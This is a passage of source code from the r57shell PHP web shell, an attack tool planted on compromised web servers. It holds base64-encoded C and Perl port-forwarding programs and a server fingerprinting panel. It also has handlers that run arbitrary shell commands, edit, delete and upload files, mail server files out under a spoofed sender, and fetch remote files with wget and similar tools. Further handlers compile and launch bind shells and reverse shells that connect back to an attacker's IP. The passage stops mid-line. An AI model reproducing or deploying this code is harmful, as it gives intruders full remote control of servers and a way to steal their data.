+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA 
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC 
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV 
+ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." 
<a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; 
+echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +$f = '<br>'; +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); + mr($language,$res); + $_POST['cmd']=""; + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + 
"type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + mr($language,$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana 
size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." 
\">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + @fwrite($file,$_POST['e_text']); + @touch($_POST['e_name'],$mtime,$mtime); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." 
...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." 
